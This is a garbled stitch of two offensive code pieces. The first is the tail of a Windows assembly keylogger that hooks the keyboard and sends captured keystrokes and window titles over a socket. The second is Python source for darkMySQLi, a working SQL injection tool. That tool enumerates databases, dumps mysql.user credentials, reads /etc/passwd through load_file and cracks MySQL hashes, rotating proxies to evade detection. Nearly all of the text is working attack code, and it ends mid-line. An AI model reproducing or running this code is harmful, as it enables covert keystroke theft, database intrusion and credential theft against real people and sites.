siguienteHook cmp byte[eax],90 ;VK_Z jg siguienteHook ;Letras A-Z stdcall isShift cmp ecx,1 jne listo mov eax,[lParam] add byte[eax],32 listo: stdcall ProcesarTecla,eax siguienteHook: invoke CallNextHookEx,[hHook],[nCode],[wParam],[lParam] ret endp proc ProcesarTecla,tecla ; Procesa la tecla capturada ;cmp [ifSock],1 ;je sEnviar ;sGuardar: ;invoke GetWindowsDirectory,WinPath,1024 ;invoke lstrcat,WinPath,nArch ;invoke CreateFile,WinPath,GENERIC_READ,0,0,OPEN_ALWAYS,0,0 ;mov [hArch],eax ;invoke GetFileSize, [hArch],NULL ;mov [fSize],eax ;invoke LocalAlloc, LPTR,[fSize] ;mov [Buffer],eax ;invoke ReadFile,[hArch],[Buffer],[fSize],dLeidos,NULL ;invoke CloseHandle,[hArch] ;invoke lstrcat,[Buffer],[tecla] ;invoke CreateFile,WinPath,GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0 ;invoke lstrlen,[Buffer] ;invoke WriteFile,[hArch],[Buffer],eax,dLeidos,NULL ;invoke CloseHandle,[hArch] ;ret sEnviar: invoke GetForegroundWindow cmp eax,[hVentana] je enviartecla mov [hVentana],eax invoke GlobalAlloc,GPTR,256 push eax invoke GetWindowText,[hVentana],eax,256 pop eax mov ebx,eax stdcall EnviarDatos,Espacio stdcall EnviarDatos,Espacio stdcall EnviarDatos,ebx stdcall EnviarDatos,Espacio enviartecla: stdcall EnviarDatos,[tecla] ret endp proc EnviarDatos,datos invoke lstrlen,[datos] invoke send,[hSock],[datos],eax,0 ret endp ;Función para obtener el estado de las mayúsculas proc isShift invoke GetKeyState,VK_CAPITAL cmp eax,1 jl pulsada jmp nopulsada pulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg noShift jmp siShift nopulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg siShift jmp noShift siShift: ; Retornamos 0 si está mayúscula, 1 si no mov ecx,1 ret noShift: mov ecx,0 ret endp
  23. # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker #!/usr/bin/python # 1/30/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Multi-Purpose MySQL Injection Tool # FUNCTIONS # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker # FEATURES # *Round Robin Proxy w/ a proxy list (non-auth or auth proxies) # *Proxy Auth (works great with Squid w/ basic auth) # *Random browser agent chosen everytime the script runs # *debug mode for seeing every URL request, proxy used, browser agent used # Share the c0de! (f*ck Windows! Get a real OS!) # darkc0de Crew # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen # and the darkc0de crew # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! 
# CHANGES # 1.6 ADDED --end evasion setting # 1.5 Fixed --strart now starts at correct number instead of +1 # 1.4 Fixed schema mode when a table was specified - app would hand after last column # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping) # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string # BE WARNED, THIS TOOL IS VERY LOUD.. import urllib, sys, re, os, socket, httplib, urllib2, time, random ##Set default evasion options here arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point arg_eva = "+" # examples "/**/" ,"+", "%20" ## colMax variable for column Finder colMax = 200 ## Set the default timeout value for requests socket.setdefaulttimeout(10) ## Default Log File Name logfile = "darkMySQLi.log" ## File Location to fuzz with for TABLE fuzzer tablefuzz = "tablesfuzz.txt" ## File Location to fuzz with for COLUMN fuzzer columnfuzz = "columnsfuzz.txt" ## File Location to fuzz with for LOAD_FILE fuzzer loadfilefuzz = "loadfilefuzz.txt" ## Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Opera/8.00 (Windows NT 5.1; U; en)"] #URL Get Function def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" 
print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology def GuessValue(URL): lower = lower_bound;upper = upper_bound while lower < upper: try: mid = (lower + upper) / 2 head_URL = URL + ">"+str(mid) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_bound and lower < upper_bound: value = lower else: head_URL = URL + "="+str(lower) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: value = lower else: value = 63 print "Could not find the ascii character! There must be a problem.." print "Check to make sure your using the my script right!" 
print "READ xprog's blind sql tutorial!\n" sys.exit(1) return value ## Functions for MySQL5 hash cracking --- THANKS d3hydr8 def c1(word): s = hashlib.sha1() s.update(word[:-1]) s2 = hashlib.sha1() s2.update(s.digest()) return s2.hexdigest() def c2(word): s = sha.new() s.update(word[:-1]) s2 = sha.new() s2.update(s.digest()) return s2.hexdigest() ## Funtion for MySQL323 hash cracking def mysql323(clear): # Taken almost verbatim from mysql's source nr = 1345345333 add = 7 nr2 = 0x12345671 retval = "" for c in clear: if c == ' ' or c == '\t': continue tmp = ord(c) nr ^= (((nr & 63) + add) * tmp) + (nr << 8) nr2 += (nr2 << 8) ^ nr add += tmp res1 = nr & ((1 << 31) - 1) res2 = nr2 & ((1 << 31) - 1) return "%08lx%08lx" % (res1, res2) #say hello if len(sys.argv) <= 1: print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h" or arg == "--help": print "\n darkMySQLi v1.6 rsauron@gmail.com" print " forum.darkc0de.com" print "Usage: ./darkMySQLi.py [options]" print "Options:" print " -h, --help shows this help message and exits" print " -d, --debug display URL debug information\n" print " Target:" print " -u URL, --url=URL Target url\n" print " Methodology:" print " -b, --blind Use blind methodology (req: --string)" print " -s, --string String to match in page when the query is valid" print " Method:" print " --method=PUT Select to use PUT method ** NOT WORKING" print " Modes:" print " --dbs Enumerate databases MySQL v5+" print " --schema Enumerate Information_schema (req: -D," print " opt: -T) MySQL v5+" print " --full Enumerate all we can MySQL v5+" print " --info MySQL Server configuration MySQL v4+" print " --fuzz Fuzz Tables & Columns Names MySQL 
v4+" print " --findcol Find Column length MySQL v4+" print " --dump Dump database table entries (req: -T," print " opt: -D, -C, --start) MySQL v4+" print " --crack=HASH Crack MySQL Hashs (req: --wordlist)" print " --wordlist=LIS.TXT Wordlist to be used for cracking" print " Define:" print " -D DB database to enumerate" print " -T TBL database table to enumerate" print " -C COL database table column to enumerate" print " Optional:" print " --ssl To use SSL" print " --end To use + and -- for the URLS --end \"--\" (Default)" print " To use /**/ and /* for the URLS --end \"/*\"" print " --rowdisp Do not display row # when dumping" print " --start=ROW Row number to begin dumping at" print " --where=COL,VALUE Use a where clause in your dump" print " --orderby=COL Use a orderby clause in your dump" print " --cookie=FILE.TXT Use a Mozilla cookie file" print " --proxy=PROXY Use a HTTP proxy to connect to the target url" print " --output=FILE.TXT Output results of tool to this file\n" sys.exit(1) #define variables site = "" proxy = "None" arg_string = "" arg_blind = "--union" arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_cookie = "None" arg_insert = "None" arg_where = "" arg_orderby = "" arg_debug = "off" arg_rowdisp = 1 arg_adminusers = 10 arg_wordlist = "" arg_ssl = "off" arg_proxy_auth = "" darkc0de = "concat(0x1e,0x1e," mode = "None" lower_bound = 0 upper_bound = 16069 line_URL = "" count_URL = "" cur_db = "" cur_table = "" terminal = "" count = 0 gets = 0 table_num = 0 num = 0 ser_ver = 3 version =[] let_pos = 1 lim_num = 0 agent = "" #Check args for arg in sys.argv: if arg == "-u" or arg == "--url": site = sys.argv[count+1] elif arg == "--output": logfile = sys.argv[count+1] elif arg == "--proxy": proxy = sys.argv[count+1] elif arg == "--proxyauth": arg_proxy_auth = sys.argv[count+1] elif arg == "--dump": mode = arg;arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg;arg_schema = 
sys.argv[count] elif arg == "--dbs": mode = arg;arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg;arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg;arg_info = sys.argv[count] elif arg == "--crack": mode = arg;arg_hash = sys.argv[count+1] elif arg == "--wordlist": arg_wordlist = sys.argv[count+1] elif arg == "--findcol": mode = arg;arg_findcol = sys.argv[count] elif arg == "--cookie": arg_cookie = sys.argv[count+1] elif arg == "--ssl": arg_ssl = "on" elif arg == "-b" or arg == "--blind": arg_blind = arg;arg_blind = sys.argv[count] elif arg == "-s" or arg == "--string": arg_string = sys.argv[count+1] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "--start": num = int(sys.argv[count+1]) - 1 table_num = num elif arg == "-d" or arg == "--debug": arg_debug = "on" elif arg == "--where": arg_where = sys.argv[count+1] elif arg == "--orderby": arg_orderby = sys.argv[count+1] elif arg == "--rowdisp": arg_rowdisp = sys.argv[count] arg_rowdisp = 0 elif arg == "--end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" count+=1 #Title write file = open(logfile, "a") print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" #Arg Error Checking if mode != "--crack" and site == "": print "[-] URL is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "None": print "[-] Mode is required!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!\n[-] Need Help? --help\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] Must include -T and -C flag. 
-D is Optional\n[-] Need Help? --help\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_ssl == "off": if site[:4] != "http": site = "http://"+site else: if site[:5] != "https": site = "https://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') if arg_cookie != "None": try: cj = cookielib.MozillaCookieJar() cj.load(arg_cookie) cookie_handler = urllib2.HTTPCookieProcessor(cj) except: print "[!] There was a problem loading your cookie file!" print "[!] Make sure the cookie file is in Mozilla Cookie File Format!" print "[!] http://xiix.wordpress.com/2006/03/23/mozillafirefox-cookie-format/\n" sys.exit(1) else: cookie_handler = urllib2.HTTPCookieProcessor() if mode != "--findcol" and arg_blind != "--blind" and mode != "--crack" and site.find("darkc0de") == -1: print "[-] Site must contain \'darkc0de\'\n" sys.exit(1) if arg_blind == "--blind" and arg_string == "": print "[-] You must specify a --string when using blind methodology.\n" sys.exit(1) if arg_columns != "None": arg_columns = arg_columns.split(",") if arg_insert != "None": arg_insert = arg_insert.split(",") if mode == "--crack" and arg_wordlist == "": print "[-] You must specify a --wordlist to crack with.\n" sys.exit(1) agent = random.choice(agents) file.write("\n|--------------------------------------------------|") file.write("\n| rsauron@gmail.com v1.6 |") file.write("\n| 1/2009 darkMySQLi.py |") file.write("\n| -- Multi Purpose MySQL Injection Tool -- |") file.write("\n| Usage: darkMySQLi.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|--------------------------------------------------|") ## MySQL Hash cracking if mode == "--crack": try: arg_wordlist = open(arg_wordlist, "r") except(IOError): print "[-] Error: Check your wordlist path\n";file.write("\n[-] Error: Check your wordlist path\n") 
sys.exit(1) if len(arg_hash) != 40 and len(arg_hash) != 16: print "\n[-] Improper hash length\n";file.write("\n\n[-] Improper hash length\n") sys.exit(1) arg_wordlist = arg_wordlist.readlines() print "[+] Words Loaded:",len(arg_wordlist);file.write("\n[+] Words Loaded: "+str(len(arg_wordlist))) if len(arg_hash) == 40: print "[+] Detected MySQL v5 Hash:",arg_hash;file.write("\n[+] Detected MySQL v5 Hash: "+arg_hash) try: import hashlib for word in arg_wordlist: if arg_hash == c1(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break except(ImportError): import sha for word in arg_wordlist: if arg_hash == c2(word): print "\n[!] Password is:",word;file.write("\n\n[!] Password is: "+word) break else: print "[+] Detected MySQL v4 Hash:",arg_hash print "[+] Try darkc0de hash database @ " for word in arg_wordlist: word = word.rstrip("\n") if arg_hash == mysql323(word): print "\n[!] Password is:",word+"\n";file.write("\n\n[!] Password is: "+word+"\n") break print "[-] Finished Searching..\n[-] Done\n";file.write("\n[-] Finished Searching..\n[-] Done\n") sys.exit(1) #General Info print "[+] URL:",site;file.write("\n\n[+] URL: "+site) print "[+] %s" % time.strftime("%X");file.write("\n[+] %s" % time.strftime("%X")) print "[+] Evasion:",arg_eva,arg_end;file.write("\n[+] Evasion: "+arg_eva+" "+arg_end) print "[+] Cookie:", arg_cookie;file.write("\n[+] Cookie: "+arg_cookie) if site[:5] == "https": print "[+] SSL: Yes";file.write("\n[+] SSL: Yes") else: print "[+] SSL: No";file.write("\n[+] SSL: No") print "[+] Agent:",agent;file.write("\n[+] Agent: "+agent) #Build proxy list proxy_list = [];proxy_list_count = [] if proxy != "None": print "[+] Building Proxy List...";file.write("\n[+] Building Proxy List...") for p in proxy: try: match = re.findall(":",p) if len(match) == 3: arg_proxy_auth = [] prox = p.split(":") arg_proxy_auth += prox if arg_proxy_auth != "": proxy_auth_handler = urllib2.HTTPBasicAuthHandler() 
proxy_auth_handler.add_password("none",p,arg_proxy_auth[2],arg_proxy_auth[3]) opener = urllib2.build_opener(proxy_auth_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_auth_handler, cookie_handler)) proxy_list_count.append(p);arg_proxy_auth = "" else: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler, cookie_handler)) proxy_list_count.append(p) if len(match) == 3 or len(match) == 1: print "\tProxy:",p,"- Success";file.write("\n\tProxy:"+p+" - Success") else: print "\tProxy:",p,arg_proxy_auth[2]+":"+arg_proxy_auth[3]+"- Success";file.write("\n\tProxy:"+p+" - Success") except: print "\tProxy:",p,"- Failed [ERROR]:",sys.exc_info()[0];file.write("\n\tProxy:"+p+" - Failed [ERROR]: "+str(sys.exc_info()[0])) pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete";file.write("\n[+] Proxy List Complete") else: print "[-] Proxy Not Given";file.write("\n[+] Proxy Not Given") proxy_list.append(urllib2.build_opener(cookie_handler)) proxy_list_count.append("None") proxy_num = 0 proxy_len = len(proxy_list) ## Blind String checking! if arg_blind == "--blind": print "[!] Blind Methodology will be used!";file.write("\n[!] Blind Methodology will be used!") head_URL = site+"+AND+1=1" source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 2: print "\n[-] The String you used has been found on the target page in-use more than 2 times" print "[-] This might lead to false positives with the blind methodology" print "[-] Might not mean anything.. I am just trying to help out.." print "[-] If you have problems you might know why.. 
;-)\n" if len(match) == 0: print "\n[-] The String you used has not been found in the target URL!\n[-] Please try another.\n[-] Done.\n" sys.exit(1) if len(match) == 1: print "[+] Blind String Selected is Good ;-)";file.write("\n[+] Blind String Selected is Good ;-)") #Column Finder c0de if mode == "--findcol": print "[+] Attempting To find the number of columns...";file.write("\n[+] Attempting To find the number of columns...") print "[+] Testing: ", file.write("\n[+] Testing: ",) checkfor=[];nullFound=[];nullnum=[];makepretty = "" sitenew = site+"+AND+1=2+UNION+SELECT+" for x in xrange(1,colMax): try: sys.stdout.write("%s," % (x)) file.write(str(x)+",") sys.stdout.flush() darkc0de = "dark"+str(x)+"code" checkfor.append(darkc0de) if x > 1: sitenew += "," sitenew += "0x"+darkc0de.encode("hex") finalurl = sitenew+arg_end source = GetThatShit(finalurl) for y in checkfor: colFound = re.findall(y,source) if len(colFound) != 0: nullFound.append(colFound[0]) if len(nullFound) >= 1: print "\n[+] Column Length is:",len(checkfor);file.write("\n[+] Column Length is: "+str(len(checkfor))) print "[+] Found null column at column #: ",;file.write("\n[+] Found null column at column #: ",) for z in nullFound: nullcol = re.findall(("\d+"),z) nullnum.append(nullcol[0]) sys.stdout.write("%s," % (nullcol[0])) file.write(str(nullcol[0])+",") sys.stdout.flush() for z in xrange(0,len(checkfor)): z+=1 if z > 1: makepretty += "," makepretty += str(z) site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty+arg_end print "\n\n[!] SQLi URL:",site;file.write("\n\n[!] SQLi URL: "+site) for z in nullnum: site = site.replace("+"+z+",","+darkc0de,") site = site.replace(","+z+",",",darkc0de,") site = site.replace(","+z+arg_end,",darkc0de"+arg_end) print "[!] darkMySQLi URL:",site;file.write("\n[!] 
darkMySQLi URL: "+site) print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X")) print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets)) print "[-] Done\n";file.write("\n[-] Done\n") print "Don't forget to check", logfile,"\n" file.close();sys.exit(1) except (KeyboardInterrupt, SystemExit): raise except: pass print "\n[!] Sorry Column Length could not be found." file.write("\n[!] Sorry Column Length could not be found.") print "[-] You might try to change colMax variable or change evasion option.. or last but not least do it manually!" print "[-] Done\n" sys.exit(1) #Retrieve version:user:database if arg_blind != "--blind": head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration...";file.write("\n[+] Gathering MySQL Server Configuration...\n") source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][0:].split("\x1e") version = match[2] user = match[3] database = match[4] print "\tDatabase:", database;file.write("\tDatabase: "+database+"\n") print "\tUser:", user;file.write("\tUser: "+user+"\n") print "\tVersion:", version;file.write("\tVersion: "+version) else: print "\n[-] There seems to be a problem with your URL. 
Please check and try again.\n[DEBUG]:",head_URL.replace("+",arg_eva),"\n" sys.exit(1) else: print "[+] Preforming Quick MySQL Version Check...";file.write("\n[+] Preforming Quick MySQL Version Check...") while 1: config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver) source = GetThatShit(config_URL) match = re.findall(arg_string,source) if len(match) >= 1: print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!";file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!") version += str(ser_ver) break if ser_ver == 6: print "[-] Was unable to determine MySQL version.\n[-] Done" sys.exit(1) ser_ver+=1 #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if version[0] == str(4): print "\n[-] Mode Selected is incompatible with MySQL v4 Servers" print "[-] -h for help" sys.exit(1) # Mode --info if mode == "--info" and arg_blind != "--blind": head_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno)) if yesno == "YES <-- w00t w00t": print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. 
host:user:password") head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end source = GetThatShit(head_URL) match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0] print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend)) head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)") head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end for x in range(0,int(userend)): try: source = GetThatShit(head_URL.replace("NUM",str(x))) match = re.findall("\x1e\x1e\S+",source) match = match[0].strip("\x1e").split("\x1e") if len(match) != 3: nullvar = "NULL" match += nullvar print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2])) except (KeyboardInterrupt, SystemExit): raise except: pass else: print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!" file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!") head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) >= 1: yesno = "YES <-- w00t w00t" else: yesno = "NO" print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno)) if yesno == "YES <-- w00t w00t": fuzz_load = open(loadfilefuzz, "r").readlines() head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 1: onoff = "OFF <-- w00t w00t" else: onoff = "ON" print "\n[+] Magic quotes are:",onoff yesno = str(raw_input("\n[!] 
Would You like to fuzz LOAD_FILE (Yes/No): ")) if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes": print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...") print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n") for sysfile in fuzz_load: sysfile = sysfile.rstrip("\n") if proxy != "None": sysfile = sysfile.replace("/","%2F") sysfile = sysfile.replace(".","%2E") if onoff == "OFF <-- w00t w00t": head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end else: head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end source = GetThatShit(head_URL) match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile) head_URL = head_URL.replace("concat(","") head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","") print "[!]",head_URL;file.write("\n[!] "+head_URL) else: print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!" 
file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!") #Fuzz table/columns if mode == "--fuzz": fuzz_tables = open(tablefuzz, "r").readlines() fuzz_columns = open(columnfuzz, "r").readlines() print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...") print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables))) print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns))) print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...") if arg_blind == "--blind": fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1" else: fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end for table in fuzz_tables: table = table.rstrip("\n") table_URL = fuzz_URL.replace("TABLE",table) source = GetThatShit(table_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de", source); if len(match) > 0: print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table)) print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"") if arg_blind == "--blind": table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1" for column in fuzz_columns: column = column.rstrip("\n") if arg_blind == "--blind": column_URL = table_URL.replace("COLUMN",column) else: column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")") source = GetThatShit(column_URL) if arg_blind == "--blind": match = re.findall(arg_string,source) else: match = re.findall("darkc0de",source) if len(match) > 0: print "[!] Found a column called:",column;file.write("\n[!] 
Found a column called:"+column) print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!") #Build URLS for each different mode if mode == "--schema": if arg_database != "None" and arg_table == "None": if arg_blind == "--blind": print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"") count_URL = site+"+and+((SELECT+COUNT(table_name)" count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+table_name" line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex") else: print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)") count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex") arg_row = "Tables" if arg_database != "None" and arg_table != "None": if arg_blind == "--blind": print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") count_URL = site+"+and+((SELECT+COUNT(column_name)" count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))" line_URL = site+"+and+ascii(substring((SELECT+column_name" line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") else: 
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex") arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns)) if arg_blind == "--blind": darkc0de = "" for column in arg_columns: darkc0de += column+",0x3a," darkc0de = darkc0de.rstrip("0x3a,") count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table else: for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table line_URL = 